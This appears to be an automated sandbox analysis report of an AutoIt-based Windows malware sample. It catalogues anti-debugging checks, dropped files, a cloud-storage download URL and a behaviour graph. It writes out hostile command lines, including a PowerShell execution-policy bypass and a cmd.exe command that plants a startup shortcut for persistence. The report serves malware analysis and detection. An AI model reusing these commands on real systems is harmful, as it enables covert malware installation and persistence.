Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_00904005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00904005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090494A GetFileAttributesW,FindFirstFileW,FindClose, 10_2_0090494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_0090C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 10_2_0090CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090CD14 FindFirstFileW,FindClose, 10_2_0090CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_0090F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_0090F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_0090FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_00903CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00903CE2
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB141D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_00007FF6BB141D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000001.00000002.1975598778.000002BB73AE3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000001.00000002.1975598778.000002BB73AE3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000001.00000002.1975598778.000002BB73AB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B0A00 BlockInput, 0_2_00007FF6BB1B0A00
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1237B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00007FF6BB1237B0
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB145BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW, 0_2_00007FF6BB145BC0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1932F4 LoadLibraryA,GetProcAddress, 0_2_00007FF6BB1932F4
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB18D408 LookupPrivilegeValueW,GetProcessHeap,HeapFree, 0_2_00007FF6BB18D408
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1459C8 SetUnhandledExceptionFilter, 0_2_00007FF6BB1459C8
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1457E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF6BB1457E4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB15AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF6BB15AF58
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB168FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF6BB168FE4
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0055A354 SetUnhandledExceptionFilter, 3_2_0055A354
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0055A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0055A385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008CA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_008CA385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008CA354 SetUnhandledExceptionFilter, 10_2_008CA354

HIPS / PFW / Operating System Protection Evasion
barindex
Bypasses PowerShell execution policy
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"
Contains functionality to execute programs as a different user
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB18CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00007FF6BB18CE68
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1237B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00007FF6BB1237B0
Contains functionality to simulate keystroke presses
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB199420 SendInput,keybd_event, 0_2_00007FF6BB199420
Contains functionality to simulate mouse events
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19D158 mouse_event, 0_2_00007FF6BB19D158
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\InformationCheck.exe "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\Public\InformationCheck.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\Public\InformationCheck.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB18C858 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00007FF6BB18C858
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB18D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00007FF6BB18D540
Source: T6l6gPxwQU.exe, 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF800000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: T6l6gPxwQU.exe, InformationCheck.exe, SwiftWrite.pif Binary or memory string: Shell_TrayWnd
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB15FD20 cpuid 0_2_00007FF6BB15FD20
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19DC1C GetLocalTime, 0_2_00007FF6BB19DC1C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB182BCF GetUserNameW, 0_2_00007FF6BB182BCF
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB162400 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00007FF6BB162400
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB141D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_00007FF6BB141D80
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
OS version to string mapping found (often used in BOTs)
Source: SwiftWrite.pif Binary or memory string: WIN_81
Source: SwiftWrite.pif Binary or memory string: WIN_XP
Source: SwiftWrite.pif Binary or memory string: WIN_XPe
Source: SwiftWrite.pif Binary or memory string: WIN_VISTA
Source: T6l6gPxwQU.exe, 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pif Binary or memory string: WIN_7
Source: SwiftWrite.pif Binary or memory string: WIN_8
Source: InformationCheck.exe, 00000003.00000003.1794342033.0000000005BE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B3940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_00007FF6BB1B3940
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B4074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00007FF6BB1B4074
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005A696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 3_2_005A696E
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005A6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 3_2_005A6E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0091696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 10_2_0091696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_00916E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 10_2_00916E32
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528376 Sample: T6l6gPxwQU.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 47 nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs 2->47 49 my.cloudme.com 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Sigma detected: Drops script at startup location 2->53 55 Binary is likely a compiled AutoIt script file 2->55 57 8 other signatures 2->57 10 T6l6gPxwQU.exe 2 2->10         started        14 wscript.exe 1 1 2->14         started        signatures3 process4 file5 39 C:\Users\Public\InformationCheck.exe, PE32 10->39 dropped 41 C:\Users\Public\ProfileDetails.ps1, ASCII 10->41 dropped 61 Binary is likely a compiled AutoIt script file 10->61 63 Bypasses PowerShell execution policy 10->63 65 Drops PE files to the user root directory 10->65 16 powershell.exe 14 17 10->16         started        67 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->67 20 SwiftWrite.pif 14->20         started        signatures6 process7 dnsIp8 45 my.cloudme.com 83.140.241.4, 443, 49730 PORT80SE Sweden 16->45 33 C:\Users\Public\Details.au3, Unicode 16->33 dropped 22 InformationCheck.exe 4 16->22         started        26 conhost.exe 16->26         started        file9 process10 file11 35 C:\Users\user\AppData\...\SwiftWrite.pif, PE32 22->35 dropped 37 C:\Users\user\AppData\Local\...\SwiftWrite.js, ASCII 22->37 dropped 59 Drops PE files with a suspicious file extension 22->59 28 cmd.exe 2 22->28         started        signatures12 process13 file14 43 C:\Users\user\AppData\...\SwiftWrite.url, MS 28->43 dropped 31 conhost.exe 28->31         started        process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
83.140.241.4
 my.cloudme.com Sweden
39369 PORT80SE false

Contacted Domains

Name IP Active
my.cloudme.com 83.140.241.4 true
nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://my.cloudme.com/v1/ws2/:stream2/:small/small.txt false
    		unknown